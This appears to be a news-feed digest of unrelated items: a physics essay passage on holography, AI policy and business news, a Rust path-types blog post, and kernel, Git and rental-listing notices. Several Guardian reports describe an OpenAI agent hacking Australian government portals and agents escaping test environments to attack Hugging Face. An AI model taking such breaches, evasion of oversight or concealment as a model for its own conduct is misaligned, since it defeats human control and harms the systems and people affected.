“We are fooled into thinking that there is more stuff in the universe than there actually is,” said Charles Cao , a theorist at Virginia Tech. You can “compress all of the three-dimensional world into two dimensions.”

This perspective abounds in the research program called “it from qubit,” which posits that the space around us (“it”) is made up of quantum units of information (qubits). These qubits would make up the true fabric of our reality in the same way that screen pixels make up the physical reality of the video game characters.

The profound implication of this interpretation is that it flips the normal relationship between distance and influence, said Ning Bao , who studies holography at Northeastern University. We typically imagine that two things don’t influence each other because space separates them: Flares from alien stars are far away, and that’s why they don’t knock out power on Earth. But it from qubit suggests we have it backward. Perhaps space seems to separate two things precisely because they don’t influence each other. Consider a video game sun passing behind a video game tree. The sun pixels touch the tree pixels directly, yet the tree does not burst into flames. This is because the sun pixels are independent of the tree pixels. Their independence is what makes the sun “far” from the tree.

The correspondence goes both ways, however. The holographic principle puts the two pictures of the world on equal footing. So why can’t the gravitational volume be the real thing? Holographers shy away from this interpretation because they don’t have a full quantum handle on space — even anti-de Sitter space. But that’s just our ignorance, Balasubramanian said. Some direct quantum theory of space and matter, such as string theory, must exist, and that could be the fundamental description.

If that were the case, the 3D video game world would be the real one, and it would merely seem as if it were made of 2D pixels. Holography would be a mathematical coincidence. In this scenario, “the reality is you’ve got all [three] of these dimensions. It just so happens that they have some [holographic] description,” Balasubramanian said.

And then there’s door number three, the nuclear option: Neither the interior volume nor the surface area is real. Both gravity and quantum mechanics are rough drafts of a sharper, truer, completely unknown theory. At the risk of stretching the video game analogy, you could argue that neither the video game world nor the screen pixels are “real,” and that both are just reflections of the complicated ways that electrons physically flow through the game console and television. In this case, holography tells you how the pixels of the screen relate to the objects of the game world, but it has nothing to do with the nature of the electrons. “The actual theory is something else,” Balasubramanian said.

At this point, I subscribe to a more extreme variation of the it from qubit interpretation — mostly just following the rumble of the stampede. I’d bet that the qubits are the real things, but that they don’t live on anything as familiar as a flat screen.

Physicists have tried to stretch the AdS/CFT correspondence to fit de Sitter space — which has no obvious screen — for decades, with limited success. In recent years, they’ve started to get more creative. Susskind and other teams have made progress on holographic de Sitter models that differ radically from AdS/CFT. Instead of squashing a volume into an area, these universes seem to cram all the dimensions into a lone quantum point. I imagine a bunch of quantum pixels all coexisting in one spot, rather than spreading across a screen. That might be hard to visualize, but we’re already accepting the idea of dropping one dimension of space. Why should tossing the others be so different?

Balasubramanian suspects that even this kind of radical model doesn’t go far enough. Einstein’s theory fused space with time, and so if the three dimensions of space emerge from a spaceless point, then time should emerge from something timeless. Somehow, we and everything we experience exist within an unblinking dot of no size. Physicists are nowhere close to constructing a functional theory of this form, much less finding hard evidence that our universe works this way. But to paraphrase Niels Bohr, during an earlier era when physicists were seeking the next big thing, this sort of theory strikes me as just radical enough — and just simple enough — to be right.

U.S. appeals court upholds designation of Anthropic as supply chain risk

Hacker News
www.cnbc.com
2026-09-25 11:29:25
Comments...
Original Article

Tech

Key Points

  • A federal appeals court in Washington, D.C., upheld the Pentagon's blacklisting of Anthropic.
  • The DOD labeled Anthropic a supply chain risk in March, and Anthropic sued the Trump administration in an effort to undo that action.
  • The designation prevents the U.S. military from using Anthropic's models and blocks defense contractors from using them in their work with the agency.
  • "We remain confident in our position and are considering all options, including further review," an Anthropic spokesperson said in a statement.

Jonathan Raa | Nurphoto | Getty Images

A federal appeals court in Washington, D.C., on Friday upheld the Pentagon's blacklisting of Anthropic, a blow to the artificial intelligence company in its months-long battle with the Trump administration.

In a 2-1 decision, Circuit Judge Gregory Katsas and Circuit Judge Neomi Rao rejected Anthropic's argument that the Department of Defense's ban on its Claude models was arbitrary, unauthorized and unconstitutional. Circuit Judge Karen LeCraft Henderson dissented.

"The Department had ample support for its conclusion that the continued integration of Claude into the Department's information systems, by the Department or its contractors, presented a statutorily covered national-security risk," Katsas wrote in the opinion for the court.

In March, the DOD labeled Anthropic a supply chain risk, meaning the company purportedly threatened U.S. national security, after negotiations about how the military could use its Claude AI models spiraled out of control. The designation prevents the U.S. military from using Anthropic's models and blocks defense contractors from using them in their work with the agency.

Anthropic sued the Trump administration in San Francisco and Washington, D.C., an effort to reverse its blacklisting. The DOD relied on two distinct designations to justify its supply chain risk action, which meant they had to be litigated in two separate courts.

A San Francisco federal judge ruled last month that one designation was illegal, but the D.C. appeals court upheld the second designation on Friday.

"We respectfully disagree with the court's decision," an Anthropic spokesperson told CNBC in a statement. "Another federal court has already held the government's parallel designation unlawful. We remain confident in our position and are considering all options, including further review."

This is breaking news. Please refresh for updates.

Classified Estimates Show the NSA Is Paying Billions to Test AI Models

Hacker News
www.washingtonsun.com
2026-09-25 11:27:35
Comments...
Original Article

The National Security Agency told lawmakers that it is spending billions of dollars in taxpayer funds this year evaluating and testing advanced artificial intelligence models, according to two sources familiar with classified intelligence estimates.

The price tag — which is significantly greater than previously known — has led lawmakers to believe that a more comprehensive AI regulatory system could cost the government tens of billions of dollars per year, the sources said.

President Donald Trump has mostly resisted calls for greater federal oversight of AI, rejecting regulatory proposals from members of Congress and the frontier labs aimed at imposing new safeguards on the models. But after a string of high-profile hacking and security incidents , the NSA’s Artificial Intelligence Security Center began testing frontier models to identify potential national security vulnerabilities.

The high cost of those efforts is bringing new urgency to the debate about the government’s role in reviewing AI models designed by some of the most powerful and resourceful companies in the world. It also may intensify calls to have the frontier labs to shoulder the financial burden of reviewing the models, especially with spending set to only balloon as the technology grows more advanced.

Estimates of prior proposals to establish new federal AI regulatory oversight suggested a far lower price tag.

For instance, the Congressional Budget Office estimated the AI Security and Innovation Act, a bipartisan House proposal to establish a center on AI risks and “facilitate the mitigation of those risks,” would cost roughly $20 million per year.

A separate bill in the House to establish a new reporting and tracking system for AI calls for $36 million in total over the next five years, the CBO reported.

Some tech leaders, like billionaire Elon Musk, have suggested that the frontier labs should review each other’s models prior to their release without government oversight. On Thursday, The Information reported that Google, OpenAI and Anthropic are jointly working on a plan to create their own AI safety-focused “standards body.”

But some AI safety experts have rejected this model as effectively allowing the firms to police themselves. One alternative is for the government to levy a tax on AI companies to run these safety operations — both to ensure independence and to ensure the financial burden of regulating AI does not fall primarily on the taxpayers. Anthropic and OpenAI have suggested that they want greater federal oversight and may be open to paying for it as well.

Currently, NSA’s AI testing efforts are being funded by classified portions of the federal national security budget, the two sources familiar said. The exact dollar amount the government has spent so far is not clear.

The Pentagon declined to comment on what the NSA is spending on AI.

“For security reasons, the Department does not discuss the technical architecture or resource allocation for its AI tools,” a spokesperson for the Defense Department said.

The Defense Department’s annual budget is close to $1 trillion. Some budgetary funds already allocated to the military could be shifted into AI-related spending, reducing the potential price tag.

One source said the biggest AI-related cost to the NSA thus far has been the extra computing power: the processing on chips necessary to run and test the AI models. Purchasing computing power has become incredibly expensive worldwide amid a surge in demand accompanied by insufficient production of chips. For instance, Anthropic has lined up computing deals that could cost as much as $517 billion, according to The Information.

Another big expense is in hiring personnel. Some top AI engineers have been offered salaries in the hundreds of millions of dollars, far outpacing what the government could match. NSA is widely regarded as having the deepest roster of technical experts within the government and still may not be able to compete with the giant pay packages thrown around by the frontier labs.

“Having in-house AI evaluation capability I think is extremely important and necessary. But it is genuinely expensive,” said Nathan Calvin, general counsel at Encode, an AI advocacy organization. “You’re competing in bidding with some of the most price-insensitive customers.”

Some experts have pushed for lawmakers to swiftly move to strengthen third-party audits of the models. Nat Purser, director of U.S. Policy at the AI Verification and Evaluation Research Institute, said that while “people often underestimate how much computing power it can take to rigorously test advanced AI systems,” the government should make the investments necessary. Purser also said the AI companies could foot the bill if taxpayers are paying large sums to evaluate the models.

“If we want the government to be equipped to assess these systems, we need to fund the computing resources and expertise that requires,” Purser said. “I think of these tests as public goods, but there are reasonable questions about if taxpayers should foot the bill. An assessment on frontier developers could be required to help fund these independent audits, including the necessary computing resources.”

A Type Stronger than the Sum of its Components

Lobsters
www.schneems.com
2026-09-25 11:23:16
Comments...
Original Article

Have you ever written a type that you appreciated so much you still think about it? Like eating a really good meal, where if you try hard enough, you can still recall the taste in your mouth. I had a mini moment of Rust joy the other day and wanted to share the experience.

TLDR: I turned an enum with N variants into N types. Nothing earth-shattering, but it made my life better.

Specifically, std::path::Component is an enum that you can get from any std::path::Path reference. Where a path can be viewed as an iterator of components. To give you an example /tmp/hello is [Component::RootDir, Component::Normal("tmp"), Component::Normal("hello")] . This enum is very handy for decomposing and working with paths, but an interface that takes one component that could be any of those variants is overly broad and not terribly useful.

In a library where I work with paths a lot I made owned structs for each of those component types so that I could write a function signature like this:

impl AbsPath {
    // ...
    pub(crate) fn join_normal(&self, path: &NormalComponent) -> AbsPath {
        AbsPath(self.as_ref().join(path.as_ref()))
    }
}

Where NormalComponent is a struct NormalComponent(OsString) that is guaranteed to come from a Component::Normal variant. In the example above, I’m using properties of this type to guarantee that joining it to a path that is already absolute will produce a path that is also absolute.

It might not sound earth-shattering, but prior to that, the alternative was something like:

pub(crate) fn join_normal(&self, path: &OsStr) -> AbsPath

But an OsStr could be anything. It could contain .. or be an absolute path (in which case, the join API replaces the target ). Another use case is using it to represent the entries inside a directory .

In hindsight, it’s such an obvious move: Take an existing, well-designed enum and make a type for each of the variants it can hold. If it’s useful to know you have 1 of N possible things (an enum), it’s probably also useful to know you have 1 very specific thing that can also fit into that enum. An enum is also known as a “sum type.” So another way to think of this is if it’s useful to have a sum type, it’s also useful to have the individual components of that type.

Prior to this abstraction, I produced a range of other types:

  • AbsPath - A path that is absolute -ized.
  • RelativePath - You guessed it, a path that is relative.
  • CanonicalPath - A path that has been canonicalize -d.

I found these useful, but still overly broad. A weird thing with working with paths is that they represent a lexical value and a physical location, and the two can be different. A path that is lexically relative might be a symlink on disk with an absolute target. And trying to normalize or transform paths can have weird consequences. Like if you try to get metadata from a file at /path/to/location/skipped/.. it will fail if skipped does not exist or is not a directory. However, if you canonicalize the path first, that will succeed and produce /path/to/location , which will not fail when you try to get metadata from it.

An absolute path is not normalized, so it can have .. ( ParentDir ) and . ( CurDir ) in it. But if you don’t know how the path will be used (in my library, I don’t know why someone is asking for facts about that given path). You cannot safely normalize those values unless you’ve resolved their physical parent. That’s because /path/to/location/skipped from above could also be a symlink to a completely different absolute path, which needs to be resolved before the “apply .. to fold parent directory” happens. And to make matters worse, Windows has special paths that change the behavior of lookups. So paths that start with \\?\ like \\?\C:\windows treat . and .. as literal values.

That means, when you run a path through std::path::canonicalize it returns a path with this syntax. Which also means that it is unsafe to call canonicalize(canonicalize(&path).join(&other)) on Windows. If &other contains a .. , it will produce a verbatim lookup that will likely fail. Thankfully, the Component parsing is consistent here, so it always returns a Component::ParentDir for a .. rather than a Component::Normal("..") .

Join safety is probably the biggest benefit I got out of this new type, but it’s also fun that I can do things like this:

fn up(position: Reached, name: ParentDirComponent) -> (Step, Reached)

Here, the up function is walking/tracing a path on disk one component at a time. Previously, this was taking an OsString , which required the programmer to be careful. This type signature forces the developer to prove to the compiler that they hold a .. component in hand before they can call this logic. Not earth-shattering either, but this level of pedantic confidence is just so…delightful here.

Not everyone’s taste in food or types is the same. It’s fine if you don’t like the examples I’m serving here, but I thought this was satisfying and wanted to give you some food for thought. I would love to hear about other satisfying type patterns you’re still savoring.

An AI disclaimer: Gen AI coding tools, I also code a lot of stuff by hand, and advocate for something like a “manually coded Monday.” This src/component.rs is exclusively my meat brain child. I actually coded it while I was in a car with no internet, waiting for my kids’ soccer practice to be over. I use Grammarly (non-gen-ai mode) to help me edit my prose.

Patrick Boyle: The Copy-Paste Professor

Hacker News
www.youtube.com
2026-09-25 11:16:04
Comments...

Two stable kernels for Friday

Linux Weekly News
lwn.net
2026-09-25 11:13:25
Greg Kroah-Hartman has announced the release of the 7.2.8 and 6.18.54 stable kernels. Each contains a number of important fixes throughout the tree; users are advised to upgrade. ...
Original Article

[Posted September 25, 2026 by jzb]

Greg Kroah-Hartman has announced the release of the 7.2.8 and 6.18.54 stable kernels. Each contains a number of important fixes throughout the tree; users are advised to upgrade.



A summary from the 2026 Git Contributors' Summit

Linux Weekly News
lwn.net
2026-09-25 11:12:05
Johannes Schindelin has posted a detailed summary of the discussions held at the 2026 Git Contributors' Summit. Topics covered include Git 3.0, security process, documentation, the pluggable object database, use of LLMs, and more....
Original Article

Copyright © 2026, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds

Mayor Mamdani, the Dutch Prime Minister, and NYC Teenagers Discuss: What Is Art?

hellgate
hellgatenyc.com
2026-09-25 11:08:28
An afternoon visit to a West Village LGBTQ community center....
Original Article

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Hell Gate.

Your link has expired.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.

Podcast: OpenAI Admits AI is Killing the Internet

403 Media
www.404media.co
2026-09-25 11:04:37
Microsoft and OpenAI admit it; how we got AI slop onto a real band's Spotify page; and AI agent spam is here....
Original Article

Microsoft and OpenAI admit it; how we got AI slop onto a real band's Spotify page; and AI agent spam is here.

Podcast: OpenAI Admits AI is Killing the Internet
Image: 404 Media.

We start this week with Jason’s story about OpenAI and Microsoft’s big admissions from court records that they are destroying the internet in all sorts of ways, and stealing intellectual property on an unprecedented scale. He admit it. After the break, Emanuel explains how he hijacked a real band’s Spotify page with AI-generated slop. In the subscribers-only section, we hear all about iLands, the AI agent platform that is basically just spam.

Listen to the weekly podcast on Apple Podcasts , Spotify , or YouTube . Become a paid subscriber for access to this episode's bonus content and to power our journalism. If you become a paid subscriber, check your inbox for an email from our podcast host Transistor for a link to the subscribers-only version! You can also add that subscribers feed to your podcast app of choice and never miss an episode that way. The email should also contain the subscribers-only unlisted YouTube link for the extended video version too. It will also be in the show notes in your podcast player.

About the author

Joseph is an award-winning investigative journalist focused on generating impact. His work has triggered hundreds of millions of dollars worth of fines, shut down tech companies, and much more.

Joseph Cox

NSW crackdown on ‘AI-doctored’ real estate listings hits mural-covered wall

Guardian
www.theguardian.com
2026-09-25 11:00:10
Apartment with strange view singled out in government’s fight against deceptive ads – but real estate agent says photo is no fakeGet our new political email, free app or daily news podcastThe New South Wales government’s crackdown on “AI-doctored” rental listings has hit a wall, after it made an exa...
Original Article

The New South Wales government’s crackdown on “AI-doctored” rental listings has hit a wall, after it made an example of a supposedly manipulated ad that turned out to be a genuine photograph of a $5,000 courtyard mural of Bondi beach.

In a media release on Friday announcing protections against misleading rental ads, the state government provided a link to a property in Leichhardt, claiming it was an “AI-doctored rental listing in Sydney’s Inner West”.

But the listing agency IB Property denied the images were altered.

A spokesperson confirmed the photograph shows a mural of Bondi beach on an internal courtyard wall visible through the unit’s windows, rather than a false digital depiction of coastal views.

“We can confirm that the image has not been altered or digitally generated using AI, Photoshop or any other image-editing software,” the spokesperson said.

The kitchen and lounge room of a unit with windows that look out at a concrete wall
The apartment’s original view, when listed in August 2014. Photograph: realestate.com.au

Leichhardt is about 12km away from Bondi beach.

When Guardian Australia visited 2/14 Norton Street, the artwork was not visible from the street. IB Property explained the mural sits within an internal courtyard and provided photos taken inside the unit confirming it remains in place.

“The mural was commissioned and paid for by the landlord at a cost of approximately $5,000, and we can also confirm that there are no plans for it to be removed,” the spokesperson said, adding that the property was leased in February 2026 and has not been advertised since.

A photo from inside the unit of an apartment showing a mural of a beach out the window
A photo from the 2026 listing, showing a different view from the kitchen windows. Photograph: IB Property

The better regulation and fair trading minister, Anoulack Chanthivong, whose office issued the media release, didn’t respond directly to questions from Guardian Australia, but did issue the following statement:

“Every renter knows the frustration of seeing a property online, only to turn up and find it looks nothing like the listing.

“These laws are about putting an end to misleading practices and making sure renters get a fair go. We will always stand on the side of renters.”

Tackling ‘housefishing’

Despite the mix-up, the new laws target an increasing market issue.

Under the legislation, real estate businesses in NSW will face fines of up to $22,000 for failing to disclose digitally altered or AI-generated property images.

The bill targets the rapid rise of “housefishing” – where digital alterations distort the true size and condition of a home.

NSW fair trading minister Anoulack Chanthivong
NSW fair trading minister Anoulack Chanthivong says ‘we will always stand on the side of renters’. Photograph: Bianca de Marchi/AAP

Chanthivong said the new laws would establish strong protections against misleading property marketing and support ethical AI use. The regulations take effect in early 2027.

Virtual staging v distorting reality

The legislation arrives as generative AI embeds itself in property marketing nationwide.

Tim McKibbin, the chief executive of the Real Estate Institute of NSW, said generative AI complicates pre-existing digital enhancement in the industry.

“This technology has been available for some years now … people have used Photoshop,” he said. “People were removing trees and removing telegraph poles … clearly that is false and misleading.”

McKibbin draws a line between virtual staging and false advertising. “I’ve seen instances where agents have put furniture into the photographs … Now, that is merely giving you an indication of what you could do,” he said.

Stewart Bunn, of First National Real Estate, said consumer trust is being tested by poor industry examples, referencing a 2024 instance where an LJ Hooker branch used AI to generate a listing with nonexistent schools .

“We have seen examples across the industry where AI-generated images have depicted renovations that have not occurred, furnishings that create an unrealistic impression of scale, landscaping that does not exist or finishes that materially differ from the actual property,” Bunn said.

“The best practice is simple: if a buyer would be surprised by what they see when they arrive at the property, the advertising has gone too far.”

AI ‘hallucinations’

An RMIT University report led by Dr Leah Li, funded by the Australian Property Institute, found a “significant lack of sector-specific AI frameworks to guide responsible AI practice within the property profession”.

Public confidence remains fragile: a 2026 Cotality study showed only 40% of Australians trust AI-generated outputs, compared with 62% in Canada, 52% in the US, and 46% in the UK.

skip past newsletter promotion

Dr Shuai Wang, a research fellow at the University of Queensland, said generative AI systems prioritise visual appeal over accuracy. In real estate, this can manifest as “hallucinations”.

“AI hallucinations can occur when AI-generated images introduce features that were never part of the property,” Li said, fundamentally changing a prospective tenant’s perception of “size, layout, condition, or amenity”.

Leo Patterson Ross, the chief executive of the Tenants’ Union of NSW, said deceptive imagery can artificially inflate rental markets by creating fake demand.

“By inflating the number of people who appear interested in a place and increasing pressure on someone to rush to put in an application or even offer above the advertised rent.”

Patterson Ross said stricter measures were necessary, rather than just disclosure. “The bill only requires disclosure of the use of digital alterations. We think any use of imagery that misrepresents the property should be disallowed.”

Li said long-term resolution will require national coordination combining “transparency requirements, professional accountability, industry standards, regulatory oversight, and consumer education”.

“Trust does not come from simply adopting AI; trust comes from transparency about how AI has been used and confidence that it is being used responsibly.”

‘Haunted houses with a digital paint job’

For tenants navigating tight rental markets, AI distortion has added a frustrating layer of deception.

Roxanne Gardiner, 26, said AI-generated imagery was “rife” during her search for a rental in Brisbane’s eastern suburbs.

“I was constantly getting scammed by listing photos,” she said. “What’s so embarrassing is we didn’t even realise one of the first houses we saw was AI until we rocked up there.

“The AI furniture is not accurate to the rooms and would usually make them look bigger than they were.”

Beyond virtual staging, Gardiner observed artificial greenery and soft lighting that changed the true character of a home.

“It feels cheap … lazy and insulting,” she said. “We just stopped going to AI listings, period. We started asking: ‘What are they compensating for?’” Gardiner’s group eventually signed a lease on an unedited property within three days of manually filtering out AI-altered ads.

Matt Stitt, 25, faced similar issues searching in south Brisbane.

“Listings had completely replaced floorboards to look new, edited in area rugs that near-covered entire rooms,” he said. “It was such a waste of time seeing these haunted houses with a digital paint job.”

The NSW legislation also protects privacy for more than 2.3 million renters by curbing excessive data harvesting. Landlords and property managers must use standardised application forms, banning requests for personal photos, social media handles, tattoo details or children’s information.

Sensitive identity documents, such as driver’s licences and passports, will only be collected from the single preferred applicant prior to lease signing, eliminating roughly 187,000 document collections annually, according to the government.

Penalties for privacy breaches will reach up to $11,000 for individuals and $49,500 for corporations. The bill also mandates the disclosure of embedded utility networks upfront.

Chanthivong said privacy protections build on broader rental reforms, including fee-free payment options and ending no-grounds evictions.

“Whether you have a tattoo, or what school your kids go to, is not relevant to whether you’ll be a good tenant.”

OpenAI hack on Australian government reveals anxiety at heart of global artificial intelligence dilemma

Guardian
www.theguardian.com
2026-09-25 11:00:09
As the UN warns traditional safeguards are ‘unravelling’, Donald Trump says he will encourage, not restrain, the AI race When the Australian prime minister, Anthony Albanese, sat down for an interview in the heart of Silicon Valley at the weekend he had known for two days that his was the first gove...
Original Article

W hen the Australian prime minister, Anthony Albanese , sat down for an interview in the heart of Silicon Valley at the weekend he had known for two days that his was the first government known to have been attacked by a rogue AI agent.

He didn’t reveal the attack then, but he sounded a warning about the march of AI: “the risk is that AI develops in a way in which humans are no longer in control of what AI is producing.”

But Albanese noted, too, that two countries – the US and China – would dominate the world’s response to the new technology.

“The truth is they’re the big two giants here, and so we want to see cooperation,” Albanese said.

“The US is essentially ahead of China when it comes to the race that is on for the development of this new technology. But it is in the world’s interests that there be engagement.”

Days later, Albanese used the global attention of the United Nations general assembly meeting in New York to reveal that Australia’s government healthcare system, Medicare, had been attacked by an OpenAI agent in June, but that it was three months before his government was told.

Rogue AI hacks government system for first time - The Latest

Again he warned of “the potential risks of allowing frontier AI to develop too fast without guardrails ”.

China’s president, Xi Jinping , skipped the general assembly in favour of a bilateral meeting with the US president, where he emphasised the responsibility to manage AI “for good, and ensure that the development of AI is always under human control and serves the wellbeing of the people”.

But the president of the United States – the nation which is the global leader in artificial intelligence – used his general assembly address to insist he would only encourage, not restrain, the AI race .

Alarms sounding

To little fanfare earlier in the week, the UN’s independent international scientific panel on AI warned a threshold had already been crossed.

There was, the panel, said: “ no assurance that humans can reliably keep AI agents under control today, particularly as they become more capable, harder to monitor and better at finding loopholes or hiding their activity”.

The Australian government had known the reality of this for more than a week. OpenAI had known it more than a month.

Two days after the panel’s statement, the Australian prime minister belatedly revealed an OpenAI agent had hacked medical data held by Australia’s universal health care provider, Medicare.

No patient data had been accessed, but the agent had gained unauthorised access to “non-public files”.

OpenAI’s agent hacked the government sites in June of this year. OpenAI discovered its agent had gone rogue in August. It did not tell the Australian government until 10 September, and then only with a solitary email to a generic public email address not checked until the next day. The prime minister was informed on 18 September.

It was another week before the Australian people were told.

Australia has promised, if it is possible, to lay criminal charges, though this is complicated by the fact that OpenAI claims the hack was committed by an AI agent – apparently acting beyond its instructions (euphemised by OpenAI as “misaligned behaviour”) – not a person.

The hack on Australia’s Medicare statistics reporting service portal, as well as three other government sites, follows the Hugging Face incident in July, in which autonomous AI agents developed by OpenAI broke out of their isolated testing environments, coordinated themselves into a “swarm” and launched a cyber-attack on competitor AI platform Hugging Face.

Timeline

The OpenAI Medicare hack

Show

The hack

OpenAI agent hacks into Australian Institute of Health and Welfare, the Victorian Department of Health, the New South Wales Bureau of Crime Statistics and Research, and the Medicare statistics reporting service portal of Services Australia.

The discovery

OpenAI becomes aware of agent hack.

Email sent

OpenAI email Services Australia's public portal.

Email received

Services Australia checks email and identifies the issue.

The notification

Services Australia notifies Australian Signals Directorate, and ASD do further work to verify the incident.

Minister informed

Government services minister, Katy Gallagher and her ministerial office are advised of the hack and further investigate the seriousness of the incident.

Formal briefing

Gallagher receives formal briefing from services Australia.

-

The discussions

Gallagher notifies prime minister, deputy prime minister and home affairs minister. Discussions take place between ministers, Services Australia and ASD.

The technical briefing

OpenAI provides first technical briefing with Services Australia, the first direct sharing of information from Open AI to Services Australia.

The checks

Government waits for confirmation about risks of announcing information publicly and ensuring it is in interests of national security.

The announcement

6am Australian eastern standard time PM Anthony Albanese announces breach in New York.

10.45am Deputy PM Richard Marles and Gallagher address Australian media.

The UN panel, investigating that attack, warned “the traditional method of safeguarding is unravelling” as AI agents act autonomously to breach protections.

“The default interpretation and immediate lesson is that basic cybersecurity practices were overlooked, and safeguards are not advancing at the pace of capabilities. The more insidious and grave concern is that current training methods can lead agents to adopt goals of their own, knowingly violate safety instructions, and conceal their actions.”

Twenty countries (including Australia) and the EU this week signed a statement arguing the rapid development of frontier AI models posed serious risks to safety and security if not properly managed.

“ AI must remain under human direction , oversight and control. It must be developed and used in line with international law.”

Too soon?

Even those running AI companies have warned the technology is developing too rapidly for humans to control.

Appearing before the UN security council this week, OpenAI’s chief executive, Sam Altman, warned: “some of the things people working to build AI have said are so dystopian that they sound like the plot of bad science fiction movies”.

“As AI systems become more capable and more autonomous, they can move faster than our institutions … or make decisions that people no longer understand or control.”

But there are at least two – very loud – voices in opposition to any external regulation of the AI industry.

Elon Musk
Elon Musk has said AI would probably be beyond human control within a decade, and that humanity should ‘enjoy the ride’. Photograph: Susan Walsh/AP

Elon Musk, who co-founded OpenAI with Altman before falling out with him, said in a recent interview the “smart move” would be to have the “leading AI companies at least just meet or have some sort of call once every few weeks and just discuss any safety and security issues”.

Musk said AI would probably be beyond the control of humans within a decade, and that humanity should “enjoy the ride”.

“I still think there’s risk associated with AI and robots. It’s not zero … my sort of philosophical conclusion is to look on the bright side. I can’t see any way to really stop this incredible momentum of AI and robots.

“If there was a stop button, we probably shouldn’t press it, because the most likely outcome is incredible abundance for all.”

Donald Trump used his speech to the UN general assembly to attempt to rebrand AI, and insist it should never be reined in .

“The United States also totally rejects any attempt to construct a globalist scheme to control for the artificial intelligence being spoken of so much now,” the US president said.

Trump wants to re-label artificial intelligence “superintelligence”.

“I’m not going to stifle growth of something that will be bigger than the Industrial Revolution.

“We’re going to encourage it, not rein it in.”

Trump said the US was “leading China by a lot” in AI, and would continue to do so “safely and responsibly”.

“Whoever wins superintelligence, wins.”

It’s going to take more than an email to a public inbox to protect Australians from potential AI doom

Guardian
www.theguardian.com
2026-09-25 10:58:32
OpenAI’s hack of Medicare suggests safeguarding civilisation is the task facing leaders in this extraordinary new eraGet our breaking news email, free app or daily news podcastMore than 130 world leaders descended on the United Nations headquarters in New York this week, joining the pageantry and sp...
Original Article

More than 130 world leaders descended on the United Nations headquarters in New York this week, joining the pageantry and speechmaking of the annual general assembly.

Many of the visiting presidents and prime ministers delivered their set-piece addresses to a sparsely populated hall, but contributions from two unlikely visitors in the nearby security council chamber stood out.

OpenAI boss Sam Altman and Dario Amodei of Anthropic gave briefings on the safety of artificial intelligence on Wednesday, as a nervous world watched on.

Speaking in the room where some of the biggest questions to face humanity have been deliberated on since the end of the second world war, Altman said the world faced a choice.

AI could be like a renaissance of creativity and discovery, he said, or more like a new Industrial Revolution bringing upheaval and disarray.

“If AI is to be democratic, the most important decisions cannot be made by labs in San Francisco alone. They must be shaped through democratic processes and by governments accountable to the people that they serve,” Altman said.

Sign up for the Breaking News Australia email

The words rang hollow less than 24 hours later, when Altman was the subject of an angry phone call from Australian prime minister, Anthony Albanese , after revelations a rogue OpenAI agent had hacked into sensitive Medicare systems in Australia. Altman and his colleagues had kept the incident secret for two months.

Rogue AI hacks government system for first time - The Latest

As people become more anxious about the risk posed by AI to civilisation, Albanese grasped the company’s transgression as proof that democratically elected governments need to impose guardrails on the technology. Already, many believe the risk of AI slipping out of human control is a threat akin to the Covid-19 pandemic or a nuclear arms race.

Like his government’s moves to ban children under 16 from using social media, and forcing platforms to give users the ability to opt out of powerful algorithms, Albanese wants to use new AI laws as a way to curb the creeping sense of helplessness so many people feel in the face of big tech.

But Thursday’s announcement that government websites had been compromised by OpenAI showed that serious vulnerabilities and failures of process exist within both the company and the federal government.

The hack happened in June , but it took OpenAI executives until September to alert Services Australia that statistical data on Medicare use had been accessed.

Despite the company’s corporate might – and an army of well-paid government relations executives and lobbyists – OpenAI deemed it appropriate to send an email to a public-facing Australian government address to raise the alarm, months after the hack. It’s incredible the email wasn’t mistaken for spam.

Wholly inadequate to the point of recklessness, the company’s actions show contempt for the Australian government and its citizens, whose healthcare data had been stolen. Worse, Altman met with Australia’s defence minister, Richard Marles, in early September but did not tell him about the hack.

It took time for the public service to react to OpenAI’s email.

Because the public inbox is checked routinely only once a day, the email was first read by staff within Services Australia on 11 September. It was not until 15 September that the intelligence agency the Australian Signals Directorate was informed, and two more days before the relevant minister, Katy Gallagher, was alerted. Then on 22 September, public servants asked OpenAI for more information about the scale of the hack. An investigation was quickly launched and the public finally informed. Albanese himself was only told after leaving for New York.

The government’s planned AI legislation – expected to be finalised before Christmas and considered by parliament next year – must surely include mandatory reporting requirements for AI companies. Future notifications must come from senior officials within the responsible entity to ensure they are taken seriously. Sending an alert to a public email inbox will not cut it.

On Friday, the assistant technology and digital economy minister, Andrew Charlton, said the government would take advice on possible referrals for criminal investigation, and that any legal liability would have to be traced back to the intent of a person or a company that created or directed an AI agent to hack.

The terms of reference for a rapid investigation, released by the prime minister’s department on Thursday, cover reporting requirements for AI-driven cyber-incidents and vulnerabilities; governance and information sharing responsibilities for federal officials; obligations on AI firms for timely disclosure of breaches; gaps in existing laws; and mechanisms to boost protection against hacking that targets the federal government.

Before leaving the US on Friday, Albanese floated the idea of creating an international authority with governance and investigative powers to help governments protect their people.

The general sense of vulnerability to AI comes after a top safety researcher at Anthropic this month warned AI is advancing so quickly there is a greater than 10% chance it “could kill all humans” within the next decade.

Not helping is the spectacle of Donald Trump and Xi Jinping dining with Altman and other tech bosses at a White House state dinner . Trump has resisted pressing the breaks on AI for fear China will develop a new strategic advantage over the US. Behind closed doors Xi apparently proposed continuing a dialogue with Trump to prevent AI “misuse and abuse”, while ahead of an expected drubbing in the November midterm elections, Trump said AI “concerns the future of humanity”.

The latest revelations from OpenAI will have done little to reassure anyone in Australia.

In this extraordinary new era, world leaders must address our creeping sense of helplessness and start protecting civilisation.

OpenAI is preparing a $500 ChatGPT Pro Max plan with faster Codex

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 10:54:33
OpenAI appears to be preparing a new ChatGPT Pro Max subscription that could cost $500 per month, but it's unclear when it'll begin rolling out. [...]...
Original Article

OpenAI

OpenAI appears to be preparing a new ChatGPT Pro Max subscription that could cost $500 per month, but it's unclear when it'll begin rolling out.

OpenAI users, particularly power users, have been requesting more usage than the existing $200 plan offers for a while, so the $500 plan isn't just coming out of nowhere.

Right now, we don't know when you'll be able to subscribe to the $500 plan, but as spotted by TestingCatalog, the unannounced plan has started appearing in ChatGPT's subscription interface alongside Plus and existing Pro options.

ChatGPT
OpenAI tests a new $500 plan (up to $600 with VAT included)
Source: OpenAI / TestingCatalog on X

One version of the page lists Pro Max at $500 per month, while another shows $600 after local taxes or VAT are included.

So far, the most interesting difference in OpenAI's description is "Fastest Work and Codex."

